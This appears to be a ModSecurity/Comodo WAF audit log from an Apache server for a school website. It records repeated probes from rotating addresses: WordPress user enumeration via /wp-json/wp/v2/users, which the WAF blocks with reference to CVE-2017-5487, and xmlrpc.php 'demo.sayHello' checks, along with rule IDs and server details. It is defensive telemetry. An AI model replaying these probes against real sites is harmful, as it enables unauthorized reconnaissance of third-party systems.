5830 (- - -) Stopwatch2: 1746298269512008 5830; combined=4310, p1=586, p2=3564, p3=32, p4=25, p5=62, sr=77, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0bd6e131-Z-- --c6cd8f3b-A-- [04/May/2025:01:51:12 +0700] aBZloMP0ZqGY3Jj2X92cggAAAAE 103.236.140.4 50534 103.236.140.4 8181 --c6cd8f3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6cd8f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6cd8f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298272412599 2222 (- - -) Stopwatch2: 1746298272412599 2222; combined=1095, p1=345, p2=717, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6cd8f3b-Z-- --6c72e140-A-- [04/May/2025:01:51:18 +0700] aBZlpoOgvPi2IO4kz1sCIAAAAJQ 103.236.140.4 50540 103.236.140.4 8181 --6c72e140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c72e140-C-- demo.sayHello --6c72e140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c72e140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298278036127 4737 (- - -) Stopwatch2: 1746298278036127 4737; combined=3687, p1=466, p2=3021, p3=24, p4=26, p5=88, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c72e140-Z-- --e215b236-A-- [04/May/2025:01:51:48 +0700] aBZlxMP0ZqGY3Jj2X92cgwAAABY 103.236.140.4 50544 103.236.140.4 8181 --e215b236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e215b236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e215b236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298308385170 3053 (- - -) Stopwatch2: 1746298308385170 3053; combined=1273, p1=442, p2=800, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e215b236-Z-- --32572166-A-- [04/May/2025:01:51:51 +0700] aBZlx8P0ZqGY3Jj2X92chAAAABU 103.236.140.4 50548 103.236.140.4 8181 --32572166-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --32572166-C-- demo.sayHello --32572166-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --32572166-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298311353970 4643 (- - -) Stopwatch2: 1746298311353970 4643; combined=3751, p1=449, p2=2992, p3=22, p4=24, p5=145, sr=65, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32572166-Z-- --86bbe52c-A-- [04/May/2025:01:52:06 +0700] aBZl1oOgvPi2IO4kz1sCIwAAAII 103.236.140.4 50552 103.236.140.4 8181 --86bbe52c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --86bbe52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86bbe52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298326598929 2960 (- - -) Stopwatch2: 1746298326598929 2960; combined=1331, p1=471, p2=830, p3=0, p4=0, p5=30, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86bbe52c-Z-- --87c46663-A-- [04/May/2025:01:52:10 +0700] aBZl2oOgvPi2IO4kz1sCJQAAAJc 103.236.140.4 50556 103.236.140.4 8181 --87c46663-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.133 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87c46663-C-- demo.sayHello --87c46663-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87c46663-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298330001401 5480 (- - -) Stopwatch2: 1746298330001401 5480; combined=4073, p1=526, p2=3295, p3=60, p4=34, p5=94, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87c46663-Z-- --d43b2158-A-- [04/May/2025:01:54:13 +0700] aBZmVYOgvPi2IO4kz1sCKwAAAIo 103.236.140.4 50570 103.236.140.4 8181 --d43b2158-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d43b2158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43b2158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746298453398985 2998 (- - -) Stopwatch2: 1746298453398985 2998; combined=1340, p1=478, p2=831, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43b2158-Z-- --05ea537b-A-- [04/May/2025:01:54:19 +0700] aBZmW4OgvPi2IO4kz1sCLQAAAJI 103.236.140.4 50574 103.236.140.4 8181 --05ea537b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05ea537b-C-- demo.sayHello --05ea537b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05ea537b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746298459986361 4588 (- - -) Stopwatch2: 1746298459986361 4588; combined=3583, p1=441, p2=2944, p3=24, p4=24, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05ea537b-Z-- --626f681e-A-- [04/May/2025:02:09:51 +0700] aBZp_8P0ZqGY3Jj2X92ciwAAAAA 103.236.140.4 50688 103.236.140.4 8181 --626f681e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --626f681e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --626f681e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299391761326 3250 (- - -) Stopwatch2: 1746299391761326 3250; combined=1420, p1=524, p2=860, p3=0, p4=0, p5=36, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --626f681e-Z-- --814a9f6e-A-- [04/May/2025:02:09:53 +0700] aBZqASleQJs6d7wanHHU3gAAANA 103.236.140.4 50692 103.236.140.4 8181 --814a9f6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --814a9f6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --814a9f6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299393971906 2136 (- - -) Stopwatch2: 1746299393971906 2136; combined=1077, p1=365, p2=684, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --814a9f6e-Z-- --ea32ab19-A-- [04/May/2025:02:09:56 +0700] aBZqBCleQJs6d7wanHHU3wAAAMQ 103.236.140.4 50694 103.236.140.4 8181 --ea32ab19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea32ab19-C-- demo.sayHello --ea32ab19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea32ab19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299396610601 4775 (- - -) Stopwatch2: 1746299396610601 4775; combined=3772, p1=409, p2=3151, p3=24, p4=26, p5=94, sr=66, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea32ab19-Z-- --de1bee7b-A-- [04/May/2025:02:09:59 +0700] aBZqB4OgvPi2IO4kz1sCNgAAAIM 103.236.140.4 50700 103.236.140.4 8181 --de1bee7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --de1bee7b-C-- demo.sayHello --de1bee7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --de1bee7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299399927372 5789 (- - -) Stopwatch2: 1746299399927372 5789; combined=4286, p1=511, p2=3550, p3=29, p4=32, p5=96, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de1bee7b-Z-- --9e2be359-A-- [04/May/2025:02:13:11 +0700] aBZqx4OgvPi2IO4kz1sCOgAAAIo 103.236.140.4 50728 103.236.140.4 8181 --9e2be359-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9e2be359-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e2be359-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299591784672 2981 (- - -) Stopwatch2: 1746299591784672 2981; combined=1306, p1=456, p2=820, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e2be359-Z-- --bd879b32-A-- [04/May/2025:02:13:16 +0700] aBZqzCleQJs6d7wanHHU4gAAAMs 103.236.140.4 50740 103.236.140.4 8181 --bd879b32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bd879b32-C-- demo.sayHello --bd879b32-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd879b32-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299596174706 6217 (- - -) Stopwatch2: 1746299596174706 6217; combined=4580, p1=581, p2=3752, p3=41, p4=45, p5=96, sr=71, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd879b32-Z-- --7003d637-A-- [04/May/2025:02:15:41 +0700] aBZrXUSOhfQ6W15Bgg8R1wAAAFY 103.236.140.4 50750 103.236.140.4 8181 --7003d637-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7003d637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7003d637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746299741389238 3398 (- - -) Stopwatch2: 1746299741389238 3398; combined=1460, p1=497, p2=928, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7003d637-Z-- --acab2f6a-A-- [04/May/2025:02:15:47 +0700] aBZrY4OgvPi2IO4kz1sCPwAAAJQ 103.236.140.4 50754 103.236.140.4 8181 --acab2f6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acab2f6a-C-- demo.sayHello --acab2f6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acab2f6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746299747017270 3203 (- - -) Stopwatch2: 1746299747017270 3203; combined=2369, p1=318, p2=1921, p3=16, p4=17, p5=57, sr=43, sw=40, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acab2f6a-Z-- --c8429b5e-A-- [04/May/2025:02:24:02 +0700] aBZtUsP0ZqGY3Jj2X92clwAAAAI 103.236.140.4 50812 103.236.140.4 8181 --c8429b5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8429b5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8429b5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 